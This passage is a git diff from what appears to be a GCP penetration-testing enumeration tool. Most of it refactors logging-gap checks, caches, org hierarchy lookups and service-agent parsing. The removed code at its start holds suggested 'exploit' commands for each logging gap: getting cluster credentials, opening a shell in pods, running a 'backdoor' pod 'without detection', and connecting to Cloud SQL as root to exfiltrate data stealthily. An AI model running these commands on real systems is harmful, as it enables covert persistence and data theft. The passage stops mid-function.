gaps []LoggingGap - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := service.Projects.Locations.Clusters.List(parent).Do() - if err != nil { - return nil, err - } - - for _, cluster := range resp.Clusters { - missingLogs := []string{} - loggingStatus := "enabled" - - // Check logging service - if cluster.LoggingService == "" || cluster.LoggingService == "none" { - missingLogs = append(missingLogs, "Cluster logging disabled") - loggingStatus = "disabled" - } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { - missingLogs = append(missingLogs, "Not using Cloud Logging") - loggingStatus = "partial" - } - - // Check monitoring service - if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { - missingLogs = append(missingLogs, "Cluster monitoring disabled") - } - - // Check for specific logging components - if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { - components := cluster.LoggingConfig.ComponentConfig.EnableComponents - hasSystemComponents := false - hasWorkloads := false - for _, comp := range components { - if comp == "SYSTEM_COMPONENTS" { - hasSystemComponents = true - } - if comp == "WORKLOADS" { - hasWorkloads = true - } - } - if !hasSystemComponents { - missingLogs = append(missingLogs, "System component logs disabled") - } - if !hasWorkloads { - missingLogs = append(missingLogs, "Workload logs disabled") - } - } - - if len(missingLogs) > 0 { - gap := LoggingGap{ - ResourceType: "gke", - ResourceName: cluster.Name, - ProjectID: projectID, - Location: cluster.Location, - LoggingStatus: loggingStatus, - MissingLogs: missingLogs, - StealthValue: "CRITICAL", - Recommendations: []string{ - "Enable Cloud Logging for GKE cluster", - "Enable SYSTEM_COMPONENTS and WORKLOADS logging", - }, - ExploitCommands: []string{ - fmt.Sprintf("# Get credentials for cluster with limited logging:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), - "# Run commands without workload logging:\nkubectl exec -it -- /bin/sh", - "# Deploy backdoor pods without detection:\nkubectl run backdoor --image=alpine -- sleep infinity", - }, - } - gaps = append(gaps, gap) - } - } - - return gaps, nil -} - -func (s *LoggingGapsService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { - ctx := context.Background() - service, err := s.getSQLAdminService(ctx) - if err != nil { - return nil, err - } - - var gaps []LoggingGap - - resp, err := service.Instances.List(projectID).Do() - if err != nil { - return nil, err - } - - for _, instance := range resp.Items { - missingLogs := []string{} - loggingStatus := "enabled" - - // Check database flags for logging - if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { - hasQueryLogging := false - hasConnectionLogging := false - - for _, flag := range instance.Settings.DatabaseFlags { - // MySQL flags - if flag.Name == "general_log" && flag.Value == "on" { - hasQueryLogging = true - } - // PostgreSQL flags - if flag.Name == "log_statement" && flag.Value == "all" { - hasQueryLogging = true - } - if flag.Name == "log_connections" && flag.Value == "on" { - hasConnectionLogging = true - } - } - - if !hasQueryLogging { - missingLogs = append(missingLogs, "Query logging not enabled") - loggingStatus = "partial" - } - if !hasConnectionLogging { - missingLogs = append(missingLogs, "Connection logging not enabled") - } - } else { - missingLogs = append(missingLogs, "No logging flags configured") - loggingStatus = "disabled" - } - - if len(missingLogs) > 0 { - gap := LoggingGap{ - ResourceType: "cloudsql", - ResourceName: instance.Name, - ProjectID: projectID, - Location: instance.Region, - LoggingStatus: loggingStatus, - MissingLogs: missingLogs, - StealthValue: "HIGH", - Recommendations: []string{ - "Enable query and connection logging", - "For MySQL: SET GLOBAL general_log = 'ON'", - "For PostgreSQL: ALTER SYSTEM SET log_statement = 'all'", - }, - ExploitCommands: []string{ - fmt.Sprintf("# Connect without query logging:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), - "# Execute queries without being logged", - "# Exfiltrate data stealthily", - }, - } - gaps = append(gaps, gap) - } - } - - return gaps, nil -} - -func (s *LoggingGapsService) checkLogSinks(projectID string) ([]LoggingGap, error) { - ctx := context.Background() - client, err := logging.NewConfigClient(ctx) - if err != nil { - return nil, err - } - defer client.Close() - - var gaps []LoggingGap - - parent := fmt.Sprintf("projects/%s", projectID) - it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) - - sinkCount := 0 - for { - sink, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - break - } - sinkCount++ - - // Check for disabled sinks - if sink.Disabled { - gap := LoggingGap{ - ResourceType: "log-sink", - ResourceName: sink.Name, - ProjectID: projectID, - Location: "global", - LoggingStatus: "disabled", - MissingLogs: []string{"Sink is disabled"}, - StealthValue: "HIGH", - Recommendations: []string{ - "Enable the log sink or remove if not needed", - }, - ExploitCommands: []string{ - "# Logs matching this sink filter are not being exported", - fmt.Sprintf("# Sink filter: %s", sink.Filter), - }, - } - gaps = append(gaps, gap) - } - - // Check for overly permissive exclusion filters - for _, exclusion := range sink.Exclusions { - if !exclusion.Disabled { - gap := LoggingGap{ - ResourceType: "log-exclusion", - ResourceName: fmt.Sprintf("%s/%s", sink.Name, exclusion.Name), - ProjectID: projectID, - Location: "global", - LoggingStatus: "exclusion-active", - MissingLogs: []string{fmt.Sprintf("Exclusion filter: %s", exclusion.Filter)}, - StealthValue: "MEDIUM", - Recommendations: []string{ - "Review exclusion filter for security implications", - }, - ExploitCommands: []string{ - fmt.Sprintf("# Logs matching this filter are excluded: %s", exclusion.Filter), - }, - } - gaps = append(gaps, gap) - } - } - } - - // Check if there are no sinks at all - if sinkCount == 0 { - gap := LoggingGap{ - ResourceType: "project", - ResourceName: projectID, - ProjectID: projectID, - Location: "global", - LoggingStatus: "no-export", - MissingLogs: []string{"No log sinks configured - logs only in Cloud Logging"}, - StealthValue: "LOW", - Recommendations: []string{ - "Configure log sinks to export logs to external storage", - "Ensures logs are preserved even if project is compromised", - }, - ExploitCommands: []string{ - "# Logs can be deleted if project is compromised", - "# Consider exporting to separate project or external SIEM", - }, - } - gaps = append(gaps, gap) - } - - return gaps, nil -} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go index 0863d5f4..d0c8dfaa 100644 --- a/gcp/services/loggingService/loggingService.go +++ b/gcp/services/loggingService/loggingService.go @@ -7,7 +7,11 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" logging "google.golang.org/api/logging/v2" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" ) type LoggingService struct{ @@ -271,3 +275,302 @@ func extractTopicName(destination string) string { } return "" } + +// ============================================ +// Logging Gaps - Resource Logging Configuration +// ============================================ + +// LoggingGap represents a resource with missing or incomplete logging +type LoggingGap struct { + ResourceType string // bucket, subnet, gke, cloudsql, log-sink, project + ResourceName string + ProjectID string + Location string + LoggingStatus string // disabled, partial, enabled + MissingLogs []string // Which logs are missing +} + +// getStorageService returns a Storage service client using cached session if available +func (ls *LoggingService) getStorageService(ctx context.Context) (*storage.Service, error) { + if ls.session != nil { + return sdk.CachedGetStorageService(ctx, ls.session) + } + return storage.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (ls *LoggingService) getComputeService(ctx context.Context) (*compute.Service, error) { + if ls.session != nil { + return sdk.CachedGetComputeService(ctx, ls.session) + } + return compute.NewService(ctx) +} + +// getContainerService returns a Container service client using cached session if available +func (ls *LoggingService) getContainerService(ctx context.Context) (*container.Service, error) { + if ls.session != nil { + return sdk.CachedGetContainerService(ctx, ls.session) + } + return container.NewService(ctx) +} + +// getSQLAdminService returns a SQL Admin service client using cached session if available +func (ls *LoggingService) getSQLAdminService(ctx context.Context) (*sqladmin.Service, error) { + if ls.session != nil { + return sdk.CachedGetSQLAdminServiceBeta(ctx, ls.session) + } + return sqladmin.NewService(ctx) +} + +// LoggingGaps finds resources with logging gaps in a project +func (ls *LoggingService) LoggingGaps(projectID string) ([]LoggingGap, error) { + var gaps []LoggingGap + + // Check various resource types for logging gaps + if bucketGaps, err := ls.checkBucketLogging(projectID); err == nil { + gaps = append(gaps, bucketGaps...) + } + + if computeGaps, err := ls.checkSubnetLogging(projectID); err == nil { + gaps = append(gaps, computeGaps...) + } + + if gkeGaps, err := ls.checkGKELogging(projectID); err == nil { + gaps = append(gaps, gkeGaps...) + } + + if sqlGaps, err := ls.checkCloudSQLLogging(projectID); err == nil { + gaps = append(gaps, sqlGaps...) + } + + return gaps, nil +} + +// checkBucketLogging checks GCS buckets for access logging configuration +func (ls *LoggingService) checkBucketLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getStorageService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if bucket access logging is enabled + if bucket.Logging == nil || bucket.Logging.LogBucket == "" { + missingLogs = append(missingLogs, "Access logs disabled") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +// checkSubnetLogging checks VPC subnets for flow log configuration +func (ls *LoggingService) checkSubnetLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getComputeService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + // Check VPC flow logs on subnets + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnets := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, subnet := range subnets.Subnetworks { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if VPC flow logs are enabled + if subnet.LogConfig == nil || !subnet.LogConfig.Enable { + missingLogs = append(missingLogs, "VPC Flow Logs disabled") + loggingStatus = "disabled" + } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { + missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") + loggingStatus = "partial" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "subnet", + ResourceName: subnet.Name, + ProjectID: projectID, + Location: regionName, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + } + return nil + }) + + return gaps, err +} + +// checkGKELogging checks GKE clusters for logging configuration +func (ls *LoggingService) checkGKELogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getContainerService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check logging service + if cluster.LoggingService == "" || cluster.LoggingService == "none" { + missingLogs = append(missingLogs, "Cluster logging disabled") + loggingStatus = "disabled" + } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { + missingLogs = append(missingLogs, "Not using Cloud Logging") + loggingStatus = "partial" + } + + // Check monitoring service + if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { + missingLogs = append(missingLogs, "Cluster monitoring disabled") + } + + // Check for specific logging components + if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { + components := cluster.LoggingConfig.ComponentConfig.EnableComponents + hasSystemComponents := false + hasWorkloads := false + for _, comp := range components { + if comp == "SYSTEM_COMPONENTS" { + hasSystemComponents = true + } + if comp == "WORKLOADS" { + hasWorkloads = true + } + } + if !hasSystemComponents { + missingLogs = append(missingLogs, "System component logs disabled") + } + if !hasWorkloads { + missingLogs = append(missingLogs, "Workload logs disabled") + } + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "gke", + ResourceName: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +// checkCloudSQLLogging checks Cloud SQL instances for logging configuration +func (ls *LoggingService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getSQLAdminService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check database flags for logging + if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { + hasQueryLogging := false + hasConnectionLogging := false + + for _, flag := range instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == "on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go index 4f73fc7e..57d98f35 100644 --- a/gcp/services/organizationsService/organizationsService.go +++ b/gcp/services/organizationsService/organizationsService.go @@ -327,6 +327,9 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy var ancestry []HierarchyNode resourceID := "projects/" + projectID + // Track inaccessible folder IDs so we can try to find org via search + var inaccessibleFolderID string + for { if strings.HasPrefix(resourceID, "organizations/") { orgID := strings.TrimPrefix(resourceID, "organizations/") @@ -347,6 +350,30 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy } else if strings.HasPrefix(resourceID, "folders/") { folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) if err != nil { + // Permission denied on folder - skip this folder and try to find the org + // Don't add the inaccessible folder to ancestry, just try to find the org + inaccessibleFolderID = strings.TrimPrefix(resourceID, "folders/") + + // Try to find the org by searching accessible orgs + orgsIter := orgsClient.SearchOrganizations(ctx, &resourcemanagerpb.SearchOrganizationsRequest{}) + for { + org, iterErr := orgsIter.Next() + if iterErr == iterator.Done { + break + } + if iterErr != nil { + break + } + // Add the first accessible org (best effort) + // The project likely belongs to one of the user's accessible orgs + orgID := strings.TrimPrefix(org.Name, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + }) + break + } break } folderID := strings.TrimPrefix(folder.Name, "folders/") @@ -374,6 +401,9 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy } } + // Suppress unused variable warning + _ = inaccessibleFolderID + // Reverse to go from organization to project for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { ancestry[i], ancestry[j] = ancestry[j], ancestry[i] diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go index a18f3dc4..06a28995 100644 --- a/gcp/services/serviceAgentsService/serviceAgentsService.go +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -28,6 +28,7 @@ func NewWithSession(session *gcpinternal.SafeSession) *ServiceAgentsService { type ServiceAgentInfo struct { Email string `json:"email"` ProjectID string `json:"projectId"` + SourceProject string `json:"sourceProject"` // Project the agent belongs to (extracted from email) ServiceName string `json:"serviceName"` AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. Roles []string `json:"roles"` @@ -155,8 +156,11 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen continue // Not a service agent } + // Extract source project from email + sourceProject := s.extractSourceProject(email) + // Check for cross-project access - isCrossProject := !strings.Contains(email, projectID) + isCrossProject := sourceProject != "" && sourceProject != projectID // Add or update agent if agent, exists := seenAgents[email]; exists { @@ -165,6 +169,7 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen agent := &ServiceAgentInfo{ Email: email, ProjectID: projectID, + SourceProject: sourceProject, ServiceName: agentType, AgentType: agentType, Roles: []string{binding.Role}, @@ -184,6 +189,68 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen return agents, nil } +// extractSourceProject extracts the source project ID/number from a service agent email +func (s *ServiceAgentsService) extractSourceProject(email string) string { + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + return prefix // This is the project number + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + return prefix[:idx] // Project number + } + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is the project ID + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") // Project number + } + return prefix + } + + // Pattern: PROJECT_NUMBER@compute-system.iam.gserviceaccount.com + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + // Most service agents use project number as prefix + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") + } + return prefix + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + return prefix // Project number + } + + // Pattern: PROJECT_NUMBER@container-engine-robot.iam.gserviceaccount.com + if strings.Contains(domain, "container-engine-robot") { + return prefix + } + + // Pattern: PROJECT_NUMBER@serverless-robot-prod.iam.gserviceaccount.com + if strings.Contains(domain, "serverless-robot-prod") { + return prefix + } + + return "" +} + func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { // Check known patterns for suffix, info := range KnownServiceAgents { diff --git a/globals/gcp.go b/globals/gcp.go index 6d2def9a..dac65acf 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -55,7 +55,6 @@ const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" const GCP_PUBLICACCESS_MODULE_NAME string = "public-access" const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" -const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps" const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" diff --git a/internal/gcp/attackpath_cache.go b/internal/gcp/attackpath_cache.go index adb1602c..aa2293b3 100644 --- a/internal/gcp/attackpath_cache.go +++ b/internal/gcp/attackpath_cache.go @@ -36,6 +36,10 @@ type AttackPathCache struct { // Populated indicates whether the cache has been populated with data Populated bool + // RawAttackPathData stores the complete attack path results for modules that need full details + // This avoids re-enumeration when privesc module runs after --attack-paths flag + RawAttackPathData interface{} + mu sync.RWMutex } @@ -386,9 +390,117 @@ func (c *AttackPathCache) GetStats() (privesc, exfil, lateral int) { return c.PrivescCount, c.ExfilCount, c.LateralCount } +// SetRawData stores the complete attack path data for modules that need full details +// This is used to avoid re-enumeration when running privesc after --attack-paths flag +func (c *AttackPathCache) SetRawData(data interface{}) { + c.mu.Lock() + defer c.mu.Unlock() + c.RawAttackPathData = data +} + +// GetRawData retrieves the complete attack path data +// Returns nil if no raw data is stored +func (c *AttackPathCache) GetRawData() interface{} { + c.mu.RLock() + defer c.mu.RUnlock() + return c.RawAttackPathData +} + +// HasRawData returns true if raw attack path data is available +func (c *AttackPathCache) HasRawData() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.RawAttackPathData != nil +} + +// GetImpersonationTargets returns service accounts that a principal can impersonate +// Looks for SA Impersonation category methods where the target SA is stored in ScopeID +func (c *AttackPathCache) GetImpersonationTargets(principal string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var targets []string + seen := make(map[string]bool) + + // Check all path types for SA Impersonation category + checkPaths := func(pathMap map[AttackPathType][]AttackMethod) { + for _, methods := range pathMap { + for _, m := range methods { + if m.Category == "SA Impersonation" && m.ScopeID != "" { + // ScopeID contains the target SA email when ScopeType is "resource" + if m.ScopeType == "resource" && strings.Contains(m.ScopeID, "@") { + if !seen[m.ScopeID] { + seen[m.ScopeID] = true + targets = append(targets, m.ScopeID) + } + } + } + } + } + } + + // Check by principal email (for service accounts) + if pathMap, ok := c.ServiceAccountPaths[principal]; ok { + checkPaths(pathMap) + } + + // Check with serviceAccount: prefix + prefixed := "serviceAccount:" + principal + if pathMap, ok := c.PrincipalPaths[prefixed]; ok { + checkPaths(pathMap) + } + + // Check direct principal match + if pathMap, ok := c.PrincipalPaths[principal]; ok { + checkPaths(pathMap) + } + + return targets +} + +// GetTargetsForMethod returns targets for a specific attack method +// This is useful for finding what resources a principal can access via specific permissions +func (c *AttackPathCache) GetTargetsForMethod(principal string, methodName string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var targets []string + seen := make(map[string]bool) + + checkPaths := func(pathMap map[AttackPathType][]AttackMethod) { + for _, methods := range pathMap { + for _, m := range methods { + if m.Method == methodName && m.ScopeID != "" { + if !seen[m.ScopeID] { + seen[m.ScopeID] = true + targets = append(targets, m.ScopeID) + } + } + } + } + } + + // Check all possible locations for this principal + if pathMap, ok := c.ServiceAccountPaths[principal]; ok { + checkPaths(pathMap) + } + prefixed := "serviceAccount:" + principal + if pathMap, ok := c.PrincipalPaths[prefixed]; ok { + checkPaths(pathMap) + } + if pathMap, ok := c.PrincipalPaths[principal]; ok { + checkPaths(pathMap) + } + + return targets +} + // Context key for attack path cache type attackPathCacheKey struct{} +// Context key for all-checks mode (skip individual module saves) +type allChecksModeKey struct{} + // GetAttackPathCacheFromContext retrieves the attack path cache from context func GetAttackPathCacheFromContext(ctx context.Context) *AttackPathCache { if cache, ok := ctx.Value(attackPathCacheKey{}).(*AttackPathCache); ok { @@ -402,6 +514,21 @@ func SetAttackPathCacheInContext(ctx context.Context, cache *AttackPathCache) co return context.WithValue(ctx, attackPathCacheKey{}, cache) } +// IsAllChecksMode returns true if running under all-checks command +// When true, individual modules should skip saving cache to disk +// (all-checks will save consolidated cache at the end) +func IsAllChecksMode(ctx context.Context) bool { + if mode, ok := ctx.Value(allChecksModeKey{}).(bool); ok { + return mode + } + return false +} + +// SetAllChecksMode sets the all-checks mode flag in context +func SetAllChecksMode(ctx context.Context, enabled bool) context.Context { + return context.WithValue(ctx, allChecksModeKey{}, enabled) +} + // Backward compatibility: Keep PrivescCache context functions working // They now use the unified AttackPathCache under the hood diff --git a/internal/gcp/hierarchy.go b/internal/gcp/hierarchy.go index 399c8273..8280ad8c 100644 --- a/internal/gcp/hierarchy.go +++ b/internal/gcp/hierarchy.go @@ -114,17 +114,22 @@ func BuildScopeHierarchy(projectIDs []string, provider HierarchyDataProvider) (* continue } + // If ancestry is empty, mark as standalone + if len(ancestry) == 0 { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + // Parse ancestry to find org and folder + // Note: ancestry is ordered from org -> folder(s) -> project var foundOrg, foundFolder string + var lastFolderID string for _, node := range ancestry { switch node.Type { case "organization": foundOrg = node.ID case "folder": - if foundFolder == "" { - // First folder is the direct parent - foundFolder = node.ID - } + lastFolderID = node.ID folderToOrg[node.ID] = foundOrg if _, exists := folderInfo[node.ID]; !exists { folderInfo[node.ID] = FolderScope{ @@ -137,6 +142,10 @@ func BuildScopeHierarchy(projectIDs []string, provider HierarchyDataProvider) (* } case "project": projectNames[node.ID] = node.DisplayName + // The folder directly containing this project is the last folder we saw + if lastFolderID != "" { + foundFolder = lastFolderID + } } } diff --git a/internal/gcp/org_cache.go b/internal/gcp/org_cache.go new file mode 100644 index 00000000..e1ca0ee4 --- /dev/null +++ b/internal/gcp/org_cache.go @@ -0,0 +1,207 @@ +package gcpinternal + +import ( + "context" + "sync" +) + +// OrgCache holds cached organization, folder, and project data +// This allows modules to access full org enumeration without re-querying +type OrgCache struct { + // All accessible organizations + Organizations []CachedOrganization + + // All accessible folders + Folders []CachedFolder + + // All accessible projects (full enumeration) + AllProjects []CachedProject + + // Quick lookups + ProjectByID map[string]*CachedProject + FolderByID map[string]*CachedFolder + OrgByID map[string]*CachedOrganization + + // Populated indicates whether the cache has been populated + Populated bool + + mu sync.RWMutex +} + +// CachedOrganization represents cached org info +type CachedOrganization struct { + ID string // Numeric org ID + Name string // organizations/ORGID + DisplayName string +} + +// CachedFolder represents cached folder info +type CachedFolder struct { + ID string // Folder ID + Name string // folders/FOLDERID + DisplayName string + Parent string // Parent org or folder +} + +// CachedProject represents cached project info +type CachedProject struct { + ID string // Project ID + Name string // projects/PROJECTID + DisplayName string + Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// NewOrgCache creates a new empty org cache +func NewOrgCache() *OrgCache { + return &OrgCache{ + Organizations: []CachedOrganization{}, + Folders: []CachedFolder{}, + AllProjects: []CachedProject{}, + ProjectByID: make(map[string]*CachedProject), + FolderByID: make(map[string]*CachedFolder), + OrgByID: make(map[string]*CachedOrganization), + Populated: false, + } +} + +// AddOrganization adds an organization to the cache +func (c *OrgCache) AddOrganization(org CachedOrganization) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Organizations = append(c.Organizations, org) + c.OrgByID[org.ID] = &c.Organizations[len(c.Organizations)-1] +} + +// AddFolder adds a folder to the cache +func (c *OrgCache) AddFolder(folder CachedFolder) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Folders = append(c.Folders, folder) + c.FolderByID[folder.ID] = &c.Folders[len(c.Folders)-1] +} + +// AddProject adds a project to the cache +func (c *OrgCache) AddProject(project CachedProject) { + c.mu.Lock() + defer c.mu.Unlock() + + c.AllProjects = append(c.AllProjects, project) + c.ProjectByID[project.ID] = &c.AllProjects[len(c.AllProjects)-1] +} + +// MarkPopulated marks the cache as populated +func (c *OrgCache) MarkPopulated() { + c.mu.Lock() + defer c.mu.Unlock() + c.Populated = true +} + +// IsPopulated returns whether the cache has been populated +func (c *OrgCache) IsPopulated() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.Populated +} + +// GetAllProjectIDs returns all project IDs in the cache +func (c *OrgCache) GetAllProjectIDs() []string { + c.mu.RLock() + defer c.mu.RUnlock() + + ids := make([]string, len(c.AllProjects)) + for i, p := range c.AllProjects { + ids[i] = p.ID + } + return ids +} + +// GetActiveProjectIDs returns only active project IDs +func (c *OrgCache) GetActiveProjectIDs() []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var ids []string + for _, p := range c.AllProjects { + if p.State == "ACTIVE" { + ids = append(ids, p.ID) + } + } + return ids +} + +// GetProject returns a project by ID +func (c *OrgCache) GetProject(projectID string) *CachedProject { + c.mu.RLock() + defer c.mu.RUnlock() + return c.ProjectByID[projectID] +} + +// GetFolder returns a folder by ID +func (c *OrgCache) GetFolder(folderID string) *CachedFolder { + c.mu.RLock() + defer c.mu.RUnlock() + return c.FolderByID[folderID] +} + +// GetOrganization returns an organization by ID +func (c *OrgCache) GetOrganization(orgID string) *CachedOrganization { + c.mu.RLock() + defer c.mu.RUnlock() + return c.OrgByID[orgID] +} + +// GetStats returns statistics about the cache +func (c *OrgCache) GetStats() (orgs, folders, projects int) { + c.mu.RLock() + defer c.mu.RUnlock() + return len(c.Organizations), len(c.Folders), len(c.AllProjects) +} + +// GetProjectsInOrg returns all project IDs belonging to an organization +func (c *OrgCache) GetProjectsInOrg(orgID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var ids []string + orgPrefix := "organizations/" + orgID + + // Direct children of org + for _, p := range c.AllProjects { + if p.Parent == orgPrefix { + ids = append(ids, p.ID) + } + } + + // Children of folders in this org (simplified - doesn't handle nested folders) + for _, f := range c.Folders { + if f.Parent == orgPrefix { + folderPrefix := "folders/" + f.ID + for _, p := range c.AllProjects { + if p.Parent == folderPrefix { + ids = append(ids, p.ID) + } + } + } + } + + return ids +} + +// Context key for org cache +type orgCacheKey struct{} + +// GetOrgCacheFromContext retrieves the org cache from context +func GetOrgCacheFromContext(ctx context.Context) *OrgCache { + if cache, ok := ctx.Value(orgCacheKey{}).(*OrgCache); ok { + return cache + } + return nil +} + +// SetOrgCacheInContext returns a new context with the org cache +func SetOrgCacheInContext(ctx context.Context, cache *OrgCache) context.Context { + return context.WithValue(ctx, orgCacheKey{}, cache) +} diff --git a/internal/gcp/persistent_cache.go b/internal/gcp/persistent_cache.go new file mode 100644 index 00000000..c7805355 --- /dev/null +++ b/internal/gcp/persistent_cache.go @@ -0,0 +1,389 @@ +package gcpinternal + +import ( + "encoding/gob" + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + "time" +) + +// atomicWriteGob writes data to a file atomically using a temp file and rename +// This prevents corruption if the process is interrupted during write +func atomicWriteGob(filename string, data interface{}) error { + // Create temp file in the same directory (required for atomic rename) + dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*.gob") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + // Ensure cleanup on failure + success := false + defer 